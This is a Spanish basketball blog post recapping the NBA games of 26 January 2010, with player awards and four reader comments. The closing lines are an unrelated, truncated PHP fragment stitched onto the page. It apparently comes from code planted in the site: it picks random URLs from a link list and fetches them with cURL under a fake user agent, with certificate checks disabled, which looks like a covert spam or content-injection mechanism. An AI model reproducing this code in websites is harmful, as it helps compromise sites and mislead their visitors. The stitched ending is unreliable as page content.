La Crónica (26/01/10)

27 de January de 2010 por TheDeerHunter

Parecía una jornada poco cargada de interés, con duelos desequilibrados e incluso alguno bastante intrascendente. En parte lo fue ya que los Lakers ni se despeinaron para llevarse la victoria de la capital y los Knicks le endosaron un meneo considerable a los Wolves en los dos primeros partidos de la jornada. Afortunadamente, lo mejor estaba por llegar.

Los Bucks, de la mano de Bogut, pusieron en serios aprietos a los Mavs en el American Airlines Center, hasta el punto que Delfino tuvo la bola para ganar, tras haber metido un triplaco estratosférico y que Nowitzki perdiera un balón impropio cuando podía haber matado el partido. Lo cierto es que los tejanos no están para tirar demasiados cohetes, pero peor lo tienen sus vecinos de Arizona y es que los Suns, en medio de una tremenda ola de rumores acerca del traspaso de Stat, palmaron en casa contra los Bobcats, en la prórroga. Si no es bastante doloroso ver a un all-star de la talla de Stoudamire dejarse llevar de la manera que lo hizo anoche (que no es ni de lejos la primera vez) lo es más cuando un ex como Boris Diaw te hace un roto considerable. Stephen Jackson y Gerald Wallace hicieron más o menos lo que les dio la gana y Felton remató en el tiempo extra. Por la línea de juego que llevan parece imposible que los Suns alcancen la post-temporada.

Por último también pudimos asistir a un delicioso duelo de rookies entre Stephen Curry y Tyreke Evans. Individualmente lo ganó el primero. Sin embargo, gracias a la ayuda de Hawes y Udrih los Kings retuvieron en casa la victoria.

PREMIOS

MVP: Parece que hay ganas de poner las cosas difíciles a los entrenadores a la hora de seleccionar a los jugadores que completarán los equipos del All-Stars. Pau Gasol, 26 puntos, 10 rebotes y 4 asistencias; David Lee, 28 puntos, 10 rebotes y 4 asistencias; Dirk Nowitzki, 28 puntos, 8 rebotes y 5 asistencias. Se cuela en el premio que no en el AllStars, Boris Diaw con 24 puntos, 11 rebotes y 5 asistencias.

Rookie: Aprovechando la baja de Monta Ellis, Stephen Curry se postula para presentar batalla a Tyreke Evans y Brandon Jennigs en la carrera por el ROY. Al de Milwaukke ya le puede haber superado pero muchas actuaciones como las de ayer (27 puntos, 9 rebotes y 6 asistencias) tendrá que ofrecernos para adelantar al de los Kings (anoche 23-6-4).

Sorpresa: Carlos Delfino continúa ganando protagonismo en los Bucks y anoche fue el elegido para jugarse el tiro decisivo. Su actuación hasta el momento había sido muy buena con 22 puntos (8 de 12), 6 rebotes y 5 asistencias. En Phoenix, Jared Dudley fue el mejor de su equipo con 18 puntos, 10 rebotes y 2 asistencias.

Decepción: Supongo que todo seguidor de los Lakers esperaba algo más de Ron Artest y es que anoche cuajó otra discretísima actuación aportando tan solo 5 puntos, 1 rebote y 2 asistencias. Tal vez espabile en playoffs. Ojito también al 2 de 12 de Jason Richardson.

Esfuerzo en vano: Si el año pasado el premio estuvo a punto de ser renombrado como el premio Danny Granger, este año lleva camino de ser rebautizado como “Premio Antawn Jamison“. 27 puntos y 9 rebotes en la derrota de su equipo ante los Lakers. También tuvieron un buen día en lo individual y malo en lo colectivo el anteriormente nombrado Stephen Curry y Andrew Bogut (32 puntos en una serie casi perfecta de 13 de 14 en tiro más 9 rebotes).

Comenta

4 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Lo de Jackson y Wallace esta siendo impresionante… ojala entren los Bobcats en Playoffs, porque de momento, se lo estan mereciendo bastante mas que otros equipos del Este.

      Citar

  2. Viva_Dirk dice:
    #2

    Partidazo también de Corey Brewer que tras unos años con muchas lesiones esta haciendolo bien en los Wolves.

    Puede estar interesante lo del rookie, si los Bucks se meten en play-offs y Jennings mantiene un buen nivel no descarto que este por delante de Tyreke.

      Citar

  3. Love Denise dice:
    #3

    Parece que sergio vuelve al ostracismo una vez recuperado los Kings de sus lesiones, creo que el premio ROY entre Jennings y Evans se lo llevara el que mejor estadisticas individuales tenga, puesto que los 2 equipos conseguiran mas o menos ganar los mismos partidos.
    Partidazo esta noche el de Pau, y como bien dice Viva Dirk, sensacional Wallace y Jackson que espero que lleven a los Bobcats a PO

      Citar

  4. Tobal dice:
    #4

    Yo a los Bobcats,si no pasa nada extraño creo que entrarán en los playoffs,se lo están mereciendo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>